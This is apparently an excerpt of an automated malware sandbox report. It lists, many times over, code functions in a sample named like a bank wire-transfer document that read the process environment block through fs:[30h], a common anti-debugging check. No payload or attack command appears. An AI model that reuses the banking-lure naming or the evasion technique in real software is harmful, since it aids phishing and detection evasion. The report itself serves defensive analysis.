          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0164A309 mov eax, dword ptr fs:[00000030h]6_2_0164A309
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0164A309 mov eax, dword ptr fs:[00000030h]6_2_0164A309
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0164A309 mov eax, dword ptr fs:[00000030h]6_2_0164A309
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0164A309 mov eax, dword ptr fs:[00000030h]6_2_0164A309
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0164A309 mov eax, dword ptr fs:[00000030h]6_2_0164A309
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0164A309 mov eax, dword ptr fs:[00000030h]6_2_0164A309
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0164A309 mov eax, dword ptr fs:[00000030h]6_2_0164A309
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0164A309 mov eax, dword ptr fs:[00000030h]6_2_0164A309
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0164A309 mov eax, dword ptr fs:[00000030h]6_2_0164A309
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0164A309 mov eax, dword ptr fs:[00000030h]6_2_0164A309
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0164A309 mov eax, dword ptr fs:[00000030h]6_2_0164A309
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0164A309 mov eax, dword ptr fs:[00000030h]6_2_0164A309
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0164A309 mov eax, dword ptr fs:[00000030h]6_2_0164A309
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0164A309 mov eax, dword ptr fs:[00000030h]6_2_0164A309
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016E131B mov eax, dword ptr fs:[00000030h]6_2_016E131B
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016503E2 mov eax, dword ptr fs:[00000030h]6_2_016503E2
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016503E2 mov eax, dword ptr fs:[00000030h]6_2_016503E2
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016503E2 mov eax, dword ptr fs:[00000030h]6_2_016503E2
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016503E2 mov eax, dword ptr fs:[00000030h]6_2_016503E2
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016503E2 mov eax, dword ptr fs:[00000030h]6_2_016503E2
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016503E2 mov eax, dword ptr fs:[00000030h]6_2_016503E2
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0164DBE9 mov eax, dword ptr fs:[00000030h]6_2_0164DBE9
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016D23E3 mov ecx, dword ptr fs:[00000030h]6_2_016D23E3
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016D23E3 mov ecx, dword ptr fs:[00000030h]6_2_016D23E3
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016D23E3 mov eax, dword ptr fs:[00000030h]6_2_016D23E3
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016A53CA mov eax, dword ptr fs:[00000030h]6_2_016A53CA
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016A53CA mov eax, dword ptr fs:[00000030h]6_2_016A53CA
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_01654BAD mov eax, dword ptr fs:[00000030h]6_2_01654BAD
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_01654BAD mov eax, dword ptr fs:[00000030h]6_2_01654BAD
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_01654BAD mov eax, dword ptr fs:[00000030h]6_2_01654BAD
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016F5BA5 mov eax, dword ptr fs:[00000030h]6_2_016F5BA5
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016E138A mov eax, dword ptr fs:[00000030h]6_2_016E138A
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_01631B8F mov eax, dword ptr fs:[00000030h]6_2_01631B8F
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_01631B8F mov eax, dword ptr fs:[00000030h]6_2_01631B8F
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016DD380 mov ecx, dword ptr fs:[00000030h]6_2_016DD380
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_01652397 mov eax, dword ptr fs:[00000030h]6_2_01652397
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0165B390 mov eax, dword ptr fs:[00000030h]6_2_0165B390
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016DB260 mov eax, dword ptr fs:[00000030h]6_2_016DB260
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016DB260 mov eax, dword ptr fs:[00000030h]6_2_016DB260
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016F8A62 mov eax, dword ptr fs:[00000030h]6_2_016F8A62
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0166927A mov eax, dword ptr fs:[00000030h]6_2_0166927A
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_01629240 mov eax, dword ptr fs:[00000030h]6_2_01629240
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_01629240 mov eax, dword ptr fs:[00000030h]6_2_01629240
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_01629240 mov eax, dword ptr fs:[00000030h]6_2_01629240
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_01629240 mov eax, dword ptr fs:[00000030h]6_2_01629240
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016EEA55 mov eax, dword ptr fs:[00000030h]6_2_016EEA55
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016B4257 mov eax, dword ptr fs:[00000030h]6_2_016B4257
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_01664A2C mov eax, dword ptr fs:[00000030h]6_2_01664A2C
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_01664A2C mov eax, dword ptr fs:[00000030h]6_2_01664A2C
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0164A229 mov eax, dword ptr fs:[00000030h]6_2_0164A229
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0164A229 mov eax, dword ptr fs:[00000030h]6_2_0164A229
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0164A229 mov eax, dword ptr fs:[00000030h]6_2_0164A229
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0164A229 mov eax, dword ptr fs:[00000030h]6_2_0164A229
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0164A229 mov eax, dword ptr fs:[00000030h]6_2_0164A229
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0164A229 mov eax, dword ptr fs:[00000030h]6_2_0164A229
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0164A229 mov eax, dword ptr fs:[00000030h]6_2_0164A229
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0164A229 mov eax, dword ptr fs:[00000030h]6_2_0164A229
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0164A229 mov eax, dword ptr fs:[00000030h]6_2_0164A229
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_01638A0A mov eax, dword ptr fs:[00000030h]6_2_01638A0A
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_01625210 mov eax, dword ptr fs:[00000030h]6_2_01625210
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_01625210 mov ecx, dword ptr fs:[00000030h]6_2_01625210
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_01625210 mov eax, dword ptr fs:[00000030h]6_2_01625210
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_01625210 mov eax, dword ptr fs:[00000030h]6_2_01625210
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0162AA16 mov eax, dword ptr fs:[00000030h]6_2_0162AA16
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0162AA16 mov eax, dword ptr fs:[00000030h]6_2_0162AA16
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_01643A1C mov eax, dword ptr fs:[00000030h]6_2_01643A1C
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016EAA16 mov eax, dword ptr fs:[00000030h]6_2_016EAA16
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016EAA16 mov eax, dword ptr fs:[00000030h]6_2_016EAA16
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_01652AE4 mov eax, dword ptr fs:[00000030h]6_2_01652AE4
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016E4AEF mov eax, dword ptr fs:[00000030h]6_2_016E4AEF
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016E4AEF mov eax, dword ptr fs:[00000030h]6_2_016E4AEF
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016E4AEF mov eax, dword ptr fs:[00000030h]6_2_016E4AEF
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016E4AEF mov eax, dword ptr fs:[00000030h]6_2_016E4AEF
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016E4AEF mov eax, dword ptr fs:[00000030h]6_2_016E4AEF
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016E4AEF mov eax, dword ptr fs:[00000030h]6_2_016E4AEF
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016E4AEF mov eax, dword ptr fs:[00000030h]6_2_016E4AEF
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016E4AEF mov eax, dword ptr fs:[00000030h]6_2_016E4AEF
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016E4AEF mov eax, dword ptr fs:[00000030h]6_2_016E4AEF
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016E4AEF mov eax, dword ptr fs:[00000030h]6_2_016E4AEF
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016E4AEF mov eax, dword ptr fs:[00000030h]6_2_016E4AEF
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016E4AEF mov eax, dword ptr fs:[00000030h]6_2_016E4AEF
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016E4AEF mov eax, dword ptr fs:[00000030h]6_2_016E4AEF
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016E4AEF mov eax, dword ptr fs:[00000030h]6_2_016E4AEF
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_01652ACB mov eax, dword ptr fs:[00000030h]6_2_01652ACB
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016252A5 mov eax, dword ptr fs:[00000030h]6_2_016252A5
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016252A5 mov eax, dword ptr fs:[00000030h]6_2_016252A5
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016252A5 mov eax, dword ptr fs:[00000030h]6_2_016252A5
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016252A5 mov eax, dword ptr fs:[00000030h]6_2_016252A5
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016252A5 mov eax, dword ptr fs:[00000030h]6_2_016252A5
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0163AAB0 mov eax, dword ptr fs:[00000030h]6_2_0163AAB0
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0163AAB0 mov eax, dword ptr fs:[00000030h]6_2_0163AAB0
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0165FAB0 mov eax, dword ptr fs:[00000030h]6_2_0165FAB0
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0165D294 mov eax, dword ptr fs:[00000030h]6_2_0165D294
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0165D294 mov eax, dword ptr fs:[00000030h]6_2_0165D294
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0164C577 mov eax, dword ptr fs:[00000030h]6_2_0164C577
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0164C577 mov eax, dword ptr fs:[00000030h]6_2_0164C577
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_01663D43 mov eax, dword ptr fs:[00000030h]6_2_01663D43
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016A3540 mov eax, dword ptr fs:[00000030h]6_2_016A3540
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016D3D40 mov eax, dword ptr fs:[00000030h]6_2_016D3D40
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_01647D50 mov eax, dword ptr fs:[00000030h]6_2_01647D50
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0162AD30 mov eax, dword ptr fs:[00000030h]6_2_0162AD30
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_01633D34 mov eax, dword ptr fs:[00000030h]6_2_01633D34
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_01633D34 mov eax, dword ptr fs:[00000030h]6_2_01633D34
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_01633D34 mov eax, dword ptr fs:[00000030h]6_2_01633D34
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_01633D34 mov eax, dword ptr fs:[00000030h]6_2_01633D34
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_01633D34 mov eax, dword ptr fs:[00000030h]6_2_01633D34
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_01633D34 mov eax, dword ptr fs:[00000030h]6_2_01633D34
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_01633D34 mov eax, dword ptr fs:[00000030h]6_2_01633D34
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_01633D34 mov eax, dword ptr fs:[00000030h]6_2_01633D34
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_01633D34 mov eax, dword ptr fs:[00000030h]6_2_01633D34
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_01633D34 mov eax, dword ptr fs:[00000030h]6_2_01633D34
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_01633D34 mov eax, dword ptr fs:[00000030h]6_2_01633D34
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_01633D34 mov eax, dword ptr fs:[00000030h]6_2_01633D34
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_01633D34 mov eax, dword ptr fs:[00000030h]6_2_01633D34
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016EE539 mov eax, dword ptr fs:[00000030h]6_2_016EE539
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016F8D34 mov eax, dword ptr fs:[00000030h]6_2_016F8D34
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016AA537 mov eax, dword ptr fs:[00000030h]6_2_016AA537
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_01654D3B mov eax, dword ptr fs:[00000030h]6_2_01654D3B
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_01654D3B mov eax, dword ptr fs:[00000030h]6_2_01654D3B
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_01654D3B mov eax, dword ptr fs:[00000030h]6_2_01654D3B
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0163D5E0 mov eax, dword ptr fs:[00000030h]6_2_0163D5E0
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0163D5E0 mov eax, dword ptr fs:[00000030h]6_2_0163D5E0
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016EFDE2 mov eax, dword ptr fs:[00000030h]6_2_016EFDE2
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016EFDE2 mov eax, dword ptr fs:[00000030h]6_2_016EFDE2
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016EFDE2 mov eax, dword ptr fs:[00000030h]6_2_016EFDE2
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016EFDE2 mov eax, dword ptr fs:[00000030h]6_2_016EFDE2
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016D8DF1 mov eax, dword ptr fs:[00000030h]6_2_016D8DF1
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016A6DC9 mov eax, dword ptr fs:[00000030h]6_2_016A6DC9
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016A6DC9 mov eax, dword ptr fs:[00000030h]6_2_016A6DC9
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016A6DC9 mov eax, dword ptr fs:[00000030h]6_2_016A6DC9
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016A6DC9 mov ecx, dword ptr fs:[00000030h]6_2_016A6DC9
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016A6DC9 mov eax, dword ptr fs:[00000030h]6_2_016A6DC9
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016A6DC9 mov eax, dword ptr fs:[00000030h]6_2_016A6DC9
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016F05AC mov eax, dword ptr fs:[00000030h]6_2_016F05AC
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016F05AC mov eax, dword ptr fs:[00000030h]6_2_016F05AC
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016535A1 mov eax, dword ptr fs:[00000030h]6_2_016535A1
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_01651DB5 mov eax, dword ptr fs:[00000030h]6_2_01651DB5
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_01651DB5 mov eax, dword ptr fs:[00000030h]6_2_01651DB5
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_01651DB5 mov eax, dword ptr fs:[00000030h]6_2_01651DB5
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_01652581 mov eax, dword ptr fs:[00000030h]6_2_01652581
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_01652581 mov eax, dword ptr fs:[00000030h]6_2_01652581
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_01652581 mov eax, dword ptr fs:[00000030h]6_2_01652581
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_01652581 mov eax, dword ptr fs:[00000030h]6_2_01652581
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_01622D8A mov eax, dword ptr fs:[00000030h]6_2_01622D8A
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_01622D8A mov eax, dword ptr fs:[00000030h]6_2_01622D8A
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_01622D8A mov eax, dword ptr fs:[00000030h]6_2_01622D8A
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_01622D8A mov eax, dword ptr fs:[00000030h]6_2_01622D8A
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_01622D8A mov eax, dword ptr fs:[00000030h]6_2_01622D8A
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016E2D82 mov eax, dword ptr fs:[00000030h]6_2_016E2D82
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016E2D82 mov eax, dword ptr fs:[00000030h]6_2_016E2D82
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016E2D82 mov eax, dword ptr fs:[00000030h]6_2_016E2D82
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016E2D82 mov eax, dword ptr fs:[00000030h]6_2_016E2D82
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016E2D82 mov eax, dword ptr fs:[00000030h]6_2_016E2D82
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016E2D82 mov eax, dword ptr fs:[00000030h]6_2_016E2D82
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016E2D82 mov eax, dword ptr fs:[00000030h]6_2_016E2D82
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0165FD9B mov eax, dword ptr fs:[00000030h]6_2_0165FD9B
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0165FD9B mov eax, dword ptr fs:[00000030h]6_2_0165FD9B
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0164746D mov eax, dword ptr fs:[00000030h]6_2_0164746D
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0165AC7B mov eax, dword ptr fs:[00000030h]6_2_0165AC7B
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0165AC7B mov eax, dword ptr fs:[00000030h]6_2_0165AC7B
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0165AC7B mov eax, dword ptr fs:[00000030h]6_2_0165AC7B
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0165AC7B mov eax, dword ptr fs:[00000030h]6_2_0165AC7B
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0165AC7B mov eax, dword ptr fs:[00000030h]6_2_0165AC7B
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0165AC7B mov eax, dword ptr fs:[00000030h]6_2_0165AC7B
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0165AC7B mov eax, dword ptr fs:[00000030h]6_2_0165AC7B
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0165AC7B mov eax, dword ptr fs:[00000030h]6_2_0165AC7B
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0165AC7B mov eax, dword ptr fs:[00000030h]6_2_0165AC7B
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0165AC7B mov eax, dword ptr fs:[00000030h]6_2_0165AC7B
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0165AC7B mov eax, dword ptr fs:[00000030h]6_2_0165AC7B
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0165A44B mov eax, dword ptr fs:[00000030h]6_2_0165A44B
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016BC450 mov eax, dword ptr fs:[00000030h]6_2_016BC450
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016BC450 mov eax, dword ptr fs:[00000030h]6_2_016BC450
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0165BC2C mov eax, dword ptr fs:[00000030h]6_2_0165BC2C
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016A6C0A mov eax, dword ptr fs:[00000030h]6_2_016A6C0A
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016A6C0A mov eax, dword ptr fs:[00000030h]6_2_016A6C0A
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016A6C0A mov eax, dword ptr fs:[00000030h]6_2_016A6C0A
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016A6C0A mov eax, dword ptr fs:[00000030h]6_2_016A6C0A
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016F740D mov eax, dword ptr fs:[00000030h]6_2_016F740D
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016F740D mov eax, dword ptr fs:[00000030h]6_2_016F740D
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016F740D mov eax, dword ptr fs:[00000030h]6_2_016F740D
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016E1C06 mov eax, dword ptr fs:[00000030h]6_2_016E1C06
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016E1C06 mov eax, dword ptr fs:[00000030h]6_2_016E1C06
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016E1C06 mov eax, dword ptr fs:[00000030h]6_2_016E1C06
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016E1C06 mov eax, dword ptr fs:[00000030h]6_2_016E1C06
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016E1C06 mov eax, dword ptr fs:[00000030h]6_2_016E1C06
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016E1C06 mov eax, dword ptr fs:[00000030h]6_2_016E1C06
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016E1C06 mov eax, dword ptr fs:[00000030h]6_2_016E1C06
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016E1C06 mov eax, dword ptr fs:[00000030h]6_2_016E1C06
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016E1C06 mov eax, dword ptr fs:[00000030h]6_2_016E1C06
